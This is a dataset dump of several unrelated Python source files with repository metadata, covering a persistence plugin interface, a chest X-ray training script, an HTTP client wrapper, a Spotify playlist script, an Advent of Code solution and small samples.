"Apache-2.0"
] | 57 | 2016-08-04T16:02:05.000Z | 2017-09-15T08:20:06.000Z | coalaip/plugin.py | imbi7py/pycoalaip | cecc8f6ff4733f0525fafcee63647753e832f0be | [
"Apache-2.0"
] | 8 | 2018-11-15T16:34:59.000Z | 2021-07-09T00:20:37.000Z | from abc import ABC, abstractmethod, abstractproperty
class AbstractPlugin(ABC):
"""Abstract interface for all persistence layer plugins.
Expects the following to be defined by the subclass:
- :attr:`type` (as a read-only property)
- :func:`generate_user`
- :func:`get_status`
- :func:`save`
- :func:`transfer`
"""
@abstractproperty
def type(self):
"""A string denoting the type of plugin (e.g. BigchainDB)."""
@abstractmethod
def generate_user(self, *args, **kwargs):
"""Generate a new user on the persistence layer.
Args:
*args: argument list, as necessary
**kwargs: keyword arguments, as necessary
Returns:
A representation of a user (e.g. a tuple with the user's
public and private keypair) on the persistence layer
Raises:
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def is_same_user(self, user_a, user_b):
"""Compare the given user representations to see if they mean
the same user on the persistence layer.
Args:
user_a (any): User representation
user_b (any): User representation
Returns:
bool: Whether the given user representations are the same
user.
"""
@abstractmethod
def get_history(self, persist_id):
"""Get the ownership history of an entity on the persistence
layer.
Args:
persist_id (str): Id of the entity on the persistence layer
Returns:
list of dict: The ownership history of the entity, sorted
starting from the beginning of the entity's history
(i.e. creation). Each dict is of the form::
{
'user': A representation of a user as specified by the
persistence layer (may omit secret details, e.g. private keys),
'event_id': A reference id for the ownership event (e.g. transfer id)
}
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def get_status(self, persist_id):
"""Get the status of an entity on the persistence layer.
Args:
persist_id (str): Id of the entity on the persistence layer
Returns:
Status of the entity, in any format.
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def save(self, entity_data, *, user):
"""Create the entity on the persistence layer.
Args:
entity_data (dict): The entity's data
user (any, keyword): The user the entity should be assigned
to after creation. The user must be represented in the
same format as :meth:`generate_user`'s output.
Returns:
str: Id of the created entity on the persistence layer
Raises:
:exc:`~..EntityCreationError`: If the entity failed to be
created
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def load(self, persist_id):
"""Load the entity from the persistence layer.
Args:
persist_id (str): Id of the entity on the persistence layer
Returns:
dict: The persisted data of the entity
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def transfer(self, persist_id, transfer_payload, *, from_user, to_user):
"""Transfer the entity whose id matches :attr:`persist_id` on
the persistence layer from the current user to a new owner.
Args:
persist_id (str): Id of the entity on the persistence layer
transfer_payload (dict): The transfer's payload
from_user (any, keyword): The current owner, represented in the
same format as :meth:`generate_user`'s output
to_user (any, keyword): The new owner, represented in the same
format as :meth:`generate_user`'s output.
If the specified user format includes private
information (e.g. a private key) but is not required by
the persistence layer to identify a transfer recipient,
then this information may be omitted in this argument.
Returns:
str: Id of the transfer action on the persistence layer
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~..EntityTransferError`: If the entity failed to be
transferred
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
| 34.72956 | 91 | 0.588555 | 5,465 | 0.989678 | 0 | 0 | 5,104 | 0.924303 | 0 | 0 | 4,854 | 0.879029 |
33d1c4bc6b32f3dc2fadccad361068b5292dca5c | 6,016 | py | Python | benchmarks/chexpert/chexpert.py | paaatcha/my-thesis | e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d | [
"MIT"
] | 5 | 2020-11-12T20:11:09.000Z | 2021-03-01T12:44:05.000Z | benchmarks/chexpert/chexpert.py | paaatcha/my-thesis | e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d | [
"MIT"
] | null | null | null | benchmarks/chexpert/chexpert.py | paaatcha/my-thesis | e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Autor: André Pacheco
Email: pacheco.comp@gmail.com
"""
import sys
sys.path.insert(0,'../../') # including the path to deep-tasks folder
sys.path.insert(0,'../../my_models') # including the path to my_models folder
from constants import RAUG_PATH
sys.path.insert(0,RAUG_PATH)
from raug.loader import get_data_loader
from raug.train import fit_model
from raug.eval import test_model
from my_model import set_model
import pandas as pd
import os
import torch.optim as optim
import torch.nn as nn
import torch
from aug_chexpert import ImgTrainTransform, ImgEvalTransform
import datetime
from sacred import Experiment
from sacred.observers import FileStorageObserver
from raug.utils.loader import get_labels_frequency
# Starting sacred experiment
ex = Experiment()
@ex.config
def cnfg():
# Dataset variables
_folder = 1
_base_path = "/home/patcha/Datasets/CheXpert"
_csv_path_train = os.path.join(_base_path, "data_Pleural Effusion_train.csv")
_imgs_folder_train = _base_path
_batch_size = 30
_epochs = 150
# Training variables
_best_metric = "loss"
_pretrained = True
_lr_init = 0.001
_sched_factor = 0.1
_sched_min_lr = 1e-6
_sched_patience = 10
_early_stop = 15
_weights = "frequency"
_model_name = 'mobilenet'
_save_folder = "results/" + _model_name + "_fold_" + str(_folder) + "_" + str(datetime.datetime.now()).replace(' ', '')
# This is used to configure the sacred storage observer. In brief, it says to sacred to save its stuffs in
# _save_folder. You don't need to worry about that.
SACRED_OBSERVER = FileStorageObserver(_save_folder)
ex.observers.append(SACRED_OBSERVER)
@ex.automain
def main (_folder, _csv_path_train, _imgs_folder_train, _lr_init, _sched_factor, _sched_min_lr, _sched_patience,
_batch_size, _epochs, _early_stop, _weights, _model_name, _pretrained, _save_folder,
_best_metric):
_metric_options = {
'save_all_path': os.path.join(_save_folder, "best_metrics"),
'pred_name_scores': 'predictions_best_test.csv',
'normalize_conf_matrix': True}
_checkpoint_best = os.path.join(_save_folder, 'best-checkpoint/best-checkpoint.pth')
# Loading the csv file
csv_all_folders = pd.read_csv(_csv_path_train)
print("-" * 50)
print("- Loading validation data...")
val_csv_folder = csv_all_folders[ (csv_all_folders['folder'] == _folder) ]
train_csv_folder = csv_all_folders[ csv_all_folders['folder'] != _folder ]
# Loading validation data
val_imgs_path_ = val_csv_folder['Path'].values
val_imgs_path = ["{}/{}".format(_imgs_folder_train, img_id) for img_id in val_imgs_path_]
val_labels = val_csv_folder['diagnostic'].values
val_meta_data = None
val_data_loader = get_data_loader (val_imgs_path, val_labels, val_meta_data, transform=ImgEvalTransform(),
batch_size=_batch_size, shuf=True, num_workers=16, pin_memory=True)
print("-- Validation partition loaded with {} images".format(len(val_data_loader)*_batch_size))
print("- Loading training data...")
train_imgs_path_ = train_csv_folder['Path'].values
train_imgs_path = ["{}/{}".format(_imgs_folder_train, img_id) for img_id in train_imgs_path_]
train_labels = train_csv_folder['diagnostic'].values
train_meta_data = None
train_data_loader = get_data_loader (train_imgs_path, train_labels, train_meta_data, transform=ImgTrainTransform(),
batch_size=_batch_size, shuf=True, num_workers=16, pin_memory=True)
print("-- Training partition loaded with {} images".format(len(train_data_loader)*_batch_size))
print("-"*50)
####################################################################################################################
ser_lab_freq = get_labels_frequency(train_csv_folder, "diagnostic", "Path")
_labels_name = ser_lab_freq.index.values
_freq = ser_lab_freq.values
####################################################################################################################
print("- Loading", _model_name)
model = set_model(_model_name, len(_labels_name), pretrained=_pretrained)
####################################################################################################################
if _weights == 'frequency':
_weights = (_freq.sum() / _freq).round(3)
loss_fn = nn.CrossEntropyLoss(weight=torch.Tensor(_weights).cuda())
optimizer = optim.SGD(model.parameters(), lr=_lr_init, momentum=0.9, weight_decay=0.001)
scheduler_lr = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=_sched_factor, min_lr=_sched_min_lr,
patience=_sched_patience)
####################################################################################################################
print("- Starting the training phase...")
print("-" * 50)
fit_model (model, train_data_loader, val_data_loader, optimizer=optimizer, loss_fn=loss_fn, epochs=_epochs,
epochs_early_stop=_early_stop, save_folder=_save_folder, initial_model=None,
device=None, schedule_lr=scheduler_lr, config_bot=None, model_name="CNN", resume_train=False,
history_plot=True, val_metrics=["auc"], best_metric=_best_metric)
####################################################################################################################
# Testing the validation partition
print("- Evaluating the validation partition...")
test_model (model, val_data_loader, checkpoint_path=_checkpoint_best, loss_fn=loss_fn, save_pred=True,
partition_name='eval', metrics_to_comp='all', class_names=_labels_name, metrics_options=_metric_options,
apply_softmax=True, verbose=False)
####################################################################################################################
| 43.280576 | 123 | 0.626995 | 0 | 0 | 0 | 0 | 5,215 | 0.866711 | 0 | 0 | 1,805 | 0.299983 |
33d3616fffd736ee6840aea7591ae150b299a6b4 | 1,673 | py | Python | python-benchmarking-tools/haste/benchmarking/messaging.py | HASTE-project/benchmarking-tools | 3e65cd4019287051a612bc21fa68e4b1a5bbc745 | [
"BSD-3-Clause"
] | null | null | null | python-benchmarking-tools/haste/benchmarking/messaging.py | HASTE-project/benchmarking-tools | 3e65cd4019287051a612bc21fa68e4b1a5bbc745 | [
"BSD-3-Clause"
] | null | null | null | python-benchmarking-tools/haste/benchmarking/messaging.py | HASTE-project/benchmarking-tools | 3e65cd4019287051a612bc21fa68e4b1a5bbc745 | [
"BSD-3-Clause"
] | null | null | null | import random
import string
from itertools import repeat
import time
RANDOM_1KB = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)
for _ in range(1000))
RANDOM_100MB = bytearray(''.join(list(repeat(RANDOM_1KB, 100 * 1024))), 'utf-8')
NEWLINE = bytes("\n", 'UTF-8')[0] # 10
_counter = 0
# This takes ~0.04 seconds! but we only need to do it each time we change the params
def generate_message(shared_state_copy, newline_terminator=True):
global _counter
_counter += 1
filename = "%s_%08d" % (str(time.time()), _counter & 10000000)
content = "C%06d-F%s-" % (shared_state_copy['cpu_pause_ms'], filename)
content_bytes = bytearray(content, 'UTF-8')
length = shared_state_copy['message_bytes'] - (len(content_bytes))
if newline_terminator:
length = length + 1
content_bytes.extend(RANDOM_100MB[:length])
if newline_terminator:
content_bytes[-1] = NEWLINE
return content_bytes, filename
def parse_message(line):
return {'cpu_pause_ms': int(line[1:7])}
if __name__ == '__main__':
shared_state = {'cpu_pause_ms': 123, 'message_bytes': 30000000}
time_start = time.time()
line, filename = generate_message(shared_state)
print(time.time() - time_start)
if len(line) != 30000000 + 1: # account for \n
print(len(line))
raise Exception('generated message is wrong length')
print('generated message is correct length')
parsed = parse_message(line)
if parsed['cpu_pause_ms'] != 123:
raise Exception('CPU pause failed round trip conversion')
print('CPU pause completed round trip conversion')
| 29.875 | 99 | 0.683802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 405 | 0.24208 |
33d4ad03546e671d2c748b882701c31df889c607 | 5,338 | py | Python | async_mgun/mgun.py | maximdanilchenko/async-mgun | 66a2f1123407f91682fc8e6491ddadfb3690e238 | [
"MIT"
] | null | null | null | async_mgun/mgun.py | maximdanilchenko/async-mgun | 66a2f1123407f91682fc8e6491ddadfb3690e238 | [
"MIT"
] | null | null | null | async_mgun/mgun.py | maximdanilchenko/async-mgun | 66a2f1123407f91682fc8e6491ddadfb3690e238 | [
"MIT"
] | null | null | null | import json
from collections import namedtuple
import aiohttp
METHOD_GET = aiohttp.hdrs.METH_GET
METHOD_DELETE = aiohttp.hdrs.METH_DELETE
METHOD_POST = aiohttp.hdrs.METH_POST
METHOD_PUT = aiohttp.hdrs.METH_PUT
METHOD_PATCH = aiohttp.hdrs.METH_PATCH
CONTENT_TYPE = aiohttp.hdrs.CONTENT_TYPE
JSON_TYPE = 'application/json'
GET_METHODS = [METHOD_GET,
METHOD_DELETE]
POST_METHODS = [METHOD_POST,
METHOD_PUT,
METHOD_PATCH]
ALL_METHODS = GET_METHODS + POST_METHODS
ALL_METHODS_LOWER = [method.lower() for method in ALL_METHODS]
__all__ = ['HttpClient',
'HttpClientGroup',
'METHOD_GET',
'METHOD_DELETE',
'METHOD_POST',
'METHOD_PUT',
'METHOD_PATCH']
ApiInfo = namedtuple('ApiInfo', ['url', 'headers'])
ApiResponse = namedtuple('ApiResponse', ['status', 'data'])
def format_path(path):
return '{}'.format(path).strip('_')
async def format_response(response: aiohttp.ClientResponse, _json=json):
content_type = response.headers.get(CONTENT_TYPE, '').lower()
if JSON_TYPE not in content_type:
return ApiResponse(response.status, await response.text())
return ApiResponse(response.status, await response.json(loads=_json.loads))
class UrlBuilder:
def __init__(self, http_client, url, headers, json_worker, *args):
self.base_url = url
self.headers = headers
self.http_client = http_client
self.sub_url = [format_path(arg) for arg in args]
self.json = json_worker
def __getattr__(self, item):
self.sub_url.append(format_path(item))
return self
__getitem__ = __getattr__
def __str__(self):
return '{}/{}'.format(self.base_url,
"/".join(self.sub_url)) if self.sub_url else self.base_url
__repr__ = __str__
async def request(self, method, content=None, params=None, session=None, headers=None):
if method not in ALL_METHODS:
raise UnsupportedHttpMethod()
if method in GET_METHODS and content:
raise ContentInGet()
return await self._check_session(method=method,
url=self.__str__(),
content=content,
params=params,
session=session,
headers=headers)
async def _check_session(self, headers=None, session=None, **kwargs):
if not session:
async with self.http_client.session(headers=headers) as session:
return await self._make_request(session=session, **kwargs)
return await self._make_request(session=session, **kwargs)
async def _make_request(self, session, method, url, content=None, params=None):
async with session.request(method, url, params=params, json=content) as response:
return await format_response(response, self.json)
async def get(self, params=None, **kwargs):
return await self.request(method=METHOD_GET,
params=params,
**kwargs)
async def delete(self, params=None, **kwargs):
return await self.request(method=METHOD_DELETE,
params=params,
**kwargs)
async def post(self, content=None, **kwargs):
return await self.request(method=METHOD_POST,
content=content,
**kwargs)
async def put(self, content=None, **kwargs):
return await self.request(method=METHOD_PUT,
content=content,
**kwargs)
async def patch(self, content=None, **kwargs):
return await self.request(method=METHOD_PATCH,
content=content,
**kwargs)
class UnsupportedHttpMethod(Exception):
pass
class ContentInGet(Exception):
pass
class NoBaseUrl(Exception):
pass
def session_maker(self, headers=None):
headers = headers or {}
if self.headers:
headers.update(self.headers)
return aiohttp.ClientSession(trust_env=True,
headers=headers or None,
json_serialize=self.json.dumps)
class HttpClient:
def __init__(self, url, headers=None, json_worker=None):
self.url = url
self.headers = headers
self.json = json_worker or json
s = session = session_maker
def __str__(self):
return self.url
def __getattr__(self, name):
if name in ALL_METHODS_LOWER:
return getattr(UrlBuilder(self, self.url, self.headers, self.json), name)
return UrlBuilder(self, self.url, self.headers, self.json, name)
__getitem__ = __getattr__
class HttpClientGroup:
def __init__(self, *rules, json_worker=None):
self.urls = {name: HttpClient(url, dict(headers), json_worker)
for name, url, *headers in rules}
def __getattr__(self, name):
if name in self.urls:
return self.urls.get(name)
else:
raise NoBaseUrl('{} is not in urls'.format(name))
| 32.156627 | 91 | 0.597602 | 3,755 | 0.703447 | 0 | 0 | 0 | 0 | 2,425 | 0.45429 | 201 | 0.037655 |
33d598edbbc9d5f212435ece8b2d3abdac48c312 | 45 | py | Python | python/testData/postfix/not/and_after.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/postfix/not/and_after.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/postfix/not/and_after.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def f():
return True and not False<caret> | 22.5 | 36 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33d662830f0507f69d63779e877716fe18bc04aa | 7,071 | py | Python | 10/10.py | andleb/aoc18 | 408bf9a92f30fee692d7a2cd9b2a72ab1bbd7711 | [
"MIT"
] | 1 | 2020-03-22T16:25:01.000Z | 2020-03-22T16:25:01.000Z | 10/10.py | andleb/aoc18 | 408bf9a92f30fee692d7a2cd9b2a72ab1bbd7711 | [
"MIT"
] | null | null | null | 10/10.py | andleb/aoc18 | 408bf9a92f30fee692d7a2cd9b2a72ab1bbd7711 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 9 23:12:30 2018
@author: Andrej Leban
"""
import itertools as it
import functools as ft
import collections as coll
import sortedcontainers as sc
from blist import blist
import re
import numpy as np
import scipy.signal
import scipy.sparse
import matplotlib.pyplot as plt
def parseInput(inp):
data = []
with open(inp, 'r') as f:
for line in f:
data.append(line)
return data
def consecutive_ones(sequence):
def _consecutives():
for itr in it.repeat(iter(sequence)):
yield tuple(it.takewhile(lambda p: p == 1,
it.dropwhile(lambda p: p != 1, itr)))
return it.takewhile(lambda t: len(t), _consecutives())
def sames(sequence):
def _same():
for itr in it.repeat(iter(sequence)):
yield tuple(it.takewhile(lambda p: p == 1,
it.dropwhile(lambda p: p != 1, itr)))
return it.takewhile(lambda t: len(t), _same())
if __name__ == "__main__":
data = parseInput("input.txt")
# data = ["position=< 9, 1> velocity=< 0, 2>",
# "position=< 7, 0> velocity=<-1, 0>",
# "position=< 3, -2> velocity=<-1, 1>",
# "position=< 6, 10> velocity=<-2, -1>",
# "position=< 2, -4> velocity=< 2, 2>",
# "position=<-6, 10> velocity=< 2, -2>",
# "position=< 1, 8> velocity=< 1, -1>",
# "position=< 1, 7> velocity=< 1, 0>",
# "position=<-3, 11> velocity=< 1, -2>",
# "position=< 7, 6> velocity=<-1, -1>",
# "position=<-2, 3> velocity=< 1, 0>",
# "position=<-4, 3> velocity=< 2, 0>",
# "position=<10, -3> velocity=<-1, 1>",
# "position=< 5, 11> velocity=< 1, -2>",
# "position=< 4, 7> velocity=< 0, -1>",
# "position=< 8, -2> velocity=< 0, 1>",
# "position=<15, 0> velocity=<-2, 0>",
# "position=< 1, 6> velocity=< 1, 0>",
# "position=< 8, 9> velocity=< 0, -1>",
# "position=< 3, 3> velocity=<-1, 1>",
# "position=< 0, 5> velocity=< 0, -1>",
# "position=<-2, 2> velocity=< 2, 0>",
# "position=< 5, -2> velocity=< 1, 2>",
# "position=< 1, 4> velocity=< 2, 1>",
# "position=<-2, 7> velocity=< 2, -2>",
# "position=< 3, 6> velocity=<-1, -1>",
# "position=< 5, 0> velocity=< 1, 0>",
# "position=<-6, 0> velocity=< 2, 0>",
# "position=< 5, 9> velocity=< 1, -2>",
# "position=<14, 7> velocity=<-2, 0>",
# "position=<-3, 6> velocity=< 2, -1>"]
pos = []
dpos = []
#init
for line in data:
y, x, dy, dx = tuple(map(int,
re.search('position=<\s*([-,0-9]+)\s*,\s*([-,0-9]+)\s*>.*'
'velocity=<\s*([-,0-9]+)\s*,\s*([-,0-9]+)', line).\
groups()))
pos.append((y,x))
dpos.append((dy,dx))
posy = np.array([t[1] for t in pos])
posx = np.array([t[0] for t in pos])
dposy = np.array([t[1] for t in dpos])
dposx = np.array([t[0] for t in dpos])
# vertical line detection via convolution attempt
# sy = sorted(posy)
# sx = sorted(posx)
#
# offsety, sizy = sy[0], sy[-1] - sy[0] + 1
# offsetx, sizx = sx[0], sx[-1] - sx[0] + 1
#
# sizyO, sizxO = sizy, sizx
# offsetyO, offsetxO = offsety, offsetx
# pic = np.zeros((sizy, sizx))
# pic = scipy.sparse.csc_matrix((sizy, sizx))
# for y,x in zip(posy, posx):
# pic[y-offsety, x-offsetx] = 1
# print("\n\n\n",pic,"\n\n\n")
# kernel = np.array([[-1,-1,2,-1,-1],
# [-1,-1,2,-1,-1],
# [-1,-1,2,-1,-1],
# [-1,-1,2,-1,-1],
# [-1,-1,2,-1,-1]
# ])
# ret = scipy.signal.fftconvolve(pic, kernel, mode='valid')
# metric = 0
res = []
critLx = 8
critLy = 8
i = 0
while len(res) < 1:
posy += dposy
posx += dposx
# sy = np.array(sorted(posy))
# sx = np.array(sorted(posx))
# offsety, sizy = sy[0], sy[-1] - sy[0] + 1
# offsetx, sizx = sx[0], sx[-1] - sx[0] + 1
# pic = np.zeros((sizyO, sizxO))
# pic = scipy.sparse.csc_matrix((sizyO, sizxO))
# for y,x in zip(posy, posx):
# try:
# pic[y-offsetyO, x-offsetxO] = 1
# except:
# pass
# print("\n\n\n",pic,"\n\n\n")
#line detection
# ret = scipy.signal.fftconvolve(pic, kernel, mode='valid')
## plt.imshow(ret)
# newmetric = sum(ret[ret>0])
# print(newmetric)
#
# if newmetric > metric:
# res.append((newmetric, pic))
# metric = newmetric
#y subsequence
# sy = np.array(sy)
# sx = np.array(sx)
# diffy = sy[1:] - sy[:-1]
# cons = [i for i in consecutive_ones(diffy)]
# metric = max(list(map(len,cons)))
# print(metric)
# same xs, consy
sor = sorted(zip(posx, posy))
x = [t[0] for t in sor]
y = [t[1] for t in sor]
# seqs with same x
samesx = sorted([list(l) for _,l in \
it.groupby(enumerate(x), key=lambda x:x[1])])
#those that are over 3 long
crit = list(filter(lambda x: len(x)>=critLx, samesx))
# print(len(crit))
#find consecutive ys
# candidates
succCands = []
for cand in crit:
ys = y[cand[0][0]:cand[-1][0]+1]
# print(ys)
ylen = 1
ylens = []
yprev = ys[0]
succ = True
for j in range(1, len(ys)):
#ignore duplicates:
if ys[j] == yprev:
continue
if ys[j] - yprev == 1:
ylen += 1
yprev = ys[j]
continue
else:
ylens.append(ylen)
ylen = 1
yprev = ys[j]
ylens.append(ylen)
succY = list(filter(lambda x: x >= critLy, ylens))
if len(succY):
succCands.append(cand)
if len(succCands):
print("found")
res.append((i,succCands,sor))
i += 1
if not i % 100000:
print(i)
sor = res[0][2]
sx, sy = zip(*sor)
sy = sorted(sy)
offsety, sizy = sy[0], sy[-1] - sy[0] + 1
offsetx, sizx = sx[0], sx[-1] - sx[0] + 1
pic = np.zeros((sizy, sizx))
for x, y in res[0][2]:
try:
pic[y-offsety, x-offsetx] = 1
except KeyError:
pass
print("\n\n\n",pic,"\n\n\n")
print(i) | 28.861224 | 75 | 0.433602 | 0 | 0 | 565 | 0.079904 | 0 | 0 | 0 | 0 | 3,745 | 0.529628 |
33d6fb43a44d5548c53fbae7aa5f5112f385cc23 | 808 | py | Python | __init__.py | rookiepeng/radarsimpy | e26cc8eb1b913630dfdc9d3443279b4ae54c0109 | [
"MIT"
] | 42 | 2020-09-30T06:26:02.000Z | 2022-03-31T18:38:52.000Z | __init__.py | chisyliu/radarsimpy | e26cc8eb1b913630dfdc9d3443279b4ae54c0109 | [
"MIT"
] | 6 | 2021-01-11T21:45:20.000Z | 2022-03-18T02:48:50.000Z | __init__.py | chisyliu/radarsimpy | e26cc8eb1b913630dfdc9d3443279b4ae54c0109 | [
"MIT"
] | 12 | 2020-08-06T15:17:13.000Z | 2022-02-11T08:38:34.000Z | # distutils: language = c++
# cython: language_level=3
# ----------
# RadarSimPy - A Radar Simulator Built with Python
# Copyright (C) 2018 - PRESENT Zhengyu Peng
# E-mail: zpeng.me@gmail.com
# Website: https://zpeng.me
# ` `
# -:. -#:
# -//:. -###:
# -////:. -#####:
# -/:.://:. -###++##:
# .. `://:- -###+. :##:
# `:/+####+. :##:
# .::::::::/+###. :##:
# .////-----+##: `:###:
# `-//:. :##: `:###/.
# `-//:. :##:`:###/.
# `-//:+######/.
# `-/+####/.
# `+##+.
# :##:
# :##:
# :##:
# :##:
# :##:
# .+:
import numpy
# radar
from .radar import Radar
from .radar import Transmitter
from .radar import Receiver
__version__ = '6.1.0'
| 20.717949 | 50 | 0.308168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 663 | 0.820545 |
33d742467b639181a96935c9f1ee233a5cfa1143 | 1,542 | py | Python | setup.py | tfahey/python-sample-app | ce333ea3e6e932b4f3eec022a3654b542c310974 | [
"MIT"
] | null | null | null | setup.py | tfahey/python-sample-app | ce333ea3e6e932b4f3eec022a3654b542c310974 | [
"MIT"
] | null | null | null | setup.py | tfahey/python-sample-app | ce333ea3e6e932b4f3eec022a3654b542c310974 | [
"MIT"
] | null | null | null | from setuptools import setup
# Used in pypi.org as the README description of your package
with open("README.md", 'r') as f:
long_description = f.read()
# Remove this whole block from here...
setup(
name='python-sample-app',
version='1.0',
description='python-sample-app is a starter template for new python applications',
author='Thomas Fahey',
author_email='tntfahey@gmail.com',
license="MIT",
url="https://github.com/tfahey/python-sample-app",
packages=['python_sample_app'],
entry_points={
'console_scripts': [
'sample-app=python_sample_app.main:main',
],
},
long_description=long_description
)
exit(0)
# ...to here. Then edit the following block to match your project needs
setup(
name='<your_project>',
version='<your_project_version>',
description='<your_project_description>',
author='<your_name>',
author_email='<you@example.com>',
license="<your_project_license>",
url="<your_project_url>",
packages=['<your_project_main_package>'],
#scripts=['scripts/some_script.py'],
#python_requires='>=3',
entry_points={
'console_scripts': [
'<your_command>=<your_project_main_package>.main:main',
],
},
#install_requires=['foo', 'bar'], # Install External packages 'foo' and 'bar' as dependencies
long_description=long_description
)
| 33.521739 | 101 | 0.603113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 832 | 0.539559 |
33d849633a70f2cbfe362c04ab4b72d0b5817985 | 2,519 | py | Python | create_playlist_by_artistlist.py | sanzgiri/saregma_spotify | ba35cd27b13c63a7cb1b1452f00727be51c775c7 | [
"MIT"
] | 1 | 2019-10-10T07:39:26.000Z | 2019-10-10T07:39:26.000Z | create_playlist_by_artistlist.py | sanzgiri/saregama_spotify | ba35cd27b13c63a7cb1b1452f00727be51c775c7 | [
"MIT"
] | null | null | null | create_playlist_by_artistlist.py | sanzgiri/saregama_spotify | ba35cd27b13c63a7cb1b1452f00727be51c775c7 | [
"MIT"
] | null | null | null | import sys
import re
import spotipy
import spotipy.util as util
''' shows the albums and tracks for a given artist.
'''
def get_artist_urn(name):
results = sp.search(q='artist:' + name, type='artist')
items = results['artists']['items']
if len(items) > 0:
return items[0]['uri']
else:
return None
if __name__ == '__main__':
if len(sys.argv) < 4:
print(('Usage: {0} username playlist filename'.format(sys.argv[0])))
else:
username = sys.argv[1]
plname = sys.argv[2]
filename = sys.argv[3]
scope = 'playlist-modify-public'
token = util.prompt_for_user_token(username,scope)
if token:
sp = spotipy.Spotify(auth=token)
playlists = sp.user_playlists(username)
for playlist in playlists['items']:
if (playlist['name'] == plname):
playlist_id = playlist['id']
print("Playlist exists, deleting: ", playlist_id)
sp.user_playlist_unfollow(username, playlist_id)
break
print("Creating playlist:")
sp.user_playlist_create(username, plname, True)
playlists = sp.user_playlists(username)
for playlist in playlists['items']:
if (playlist['name'] == plname):
playlist_id = playlist['id']
print("Using: ", playlist_id)
f = open(filename, 'r')
for line in f:
name = line.strip()
# print line
# m = re.search('(.*) - (.*)', line)
# name = m.group(1)
# track = m.group(2)
# n = re.match('(\w+) \(?\w+', track)
# track = n.group(1)
artist_urn = get_artist_urn(name)
if artist_urn:
print("Found ", name)
artist_tracks = []
response = sp.artist_top_tracks(artist_urn, country='US')
for track in response['tracks']:
track_id = track['id']
artist_tracks.append(track_id)
if (len(artist_tracks) > 0):
sp.user_playlist_add_tracks(username, playlist_id, artist_tracks)
else:
print "No tracks for " + name
print(track['name'])
else:
print "Can't find artist " + name
| 33.586667 | 89 | 0.493053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 560 | 0.22231 |
33d9116df66190b4bcd4b6335837886228590452 | 466 | py | Python | Lib/site-packages/py2exe/samples/pywin32/com_typelib/pre_gen/wscript/show_info.py | Aakash10399/simple-health-glucheck | 1f7c4ff7778a44f09b1c8cb0089fef51dc26cea2 | [
"bzip2-1.0.6"
] | 35 | 2015-08-15T14:32:38.000Z | 2021-12-09T16:21:26.000Z | Lib/site-packages/py2exe/samples/pywin32/com_typelib/pre_gen/wscript/show_info.py | Aakash10399/simple-health-glucheck | 1f7c4ff7778a44f09b1c8cb0089fef51dc26cea2 | [
"bzip2-1.0.6"
] | 4 | 2015-09-12T10:42:57.000Z | 2017-02-27T04:05:51.000Z | Lib/site-packages/py2exe/samples/pywin32/com_typelib/pre_gen/wscript/show_info.py | Aakash10399/simple-health-glucheck | 1f7c4ff7778a44f09b1c8cb0089fef51dc26cea2 | [
"bzip2-1.0.6"
] | 15 | 2015-07-10T23:58:07.000Z | 2022-01-23T22:16:33.000Z | # Print some simple information using the WScript.Network object.
import sys
from win32com.client.gencache import EnsureDispatch
ob = EnsureDispatch('WScript.Network')
# For the sake of ensuring the correct module is used...
mod = sys.modules[ob.__module__]
print "The module hosting the object is", mod
# Now use the object.
print "About this computer:"
print "Domain =", ob.UserDomain
print "Computer Name =", ob.ComputerName
print "User Name =", ob.UserName
| 25.888889 | 65 | 0.761803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 255 | 0.54721 |
33d9997f9a803874867baad8259292103a1f9c38 | 974 | py | Python | BOMFinder/helpers.py | ProrokWielki/BOM_Finder | 329fbcc79014f653ea438005495c851ea5a98a4e | [
"MIT"
] | null | null | null | BOMFinder/helpers.py | ProrokWielki/BOM_Finder | 329fbcc79014f653ea438005495c851ea5a98a4e | [
"MIT"
] | null | null | null | BOMFinder/helpers.py | ProrokWielki/BOM_Finder | 329fbcc79014f653ea438005495c851ea5a98a4e | [
"MIT"
] | null | null | null | import BOMFinder.UI.UI as UI
def to_prompt_sequence(part):
prompt_sequence = []
for key, value in part.properties.items():
if isinstance(key, str):
if isinstance(value, str):
prompt_sequence.append(UI.ValuePrompt(key))
elif isinstance(value, list):
prompt_sequence.append(UI.ListPrompt(key, value))
else:
raise TypeError("Unsupporetd value type")
elif isinstance(key, tuple):
# TODO: not good
first_list = []
second_list = []
for i in value:
first_list.append(i[0])
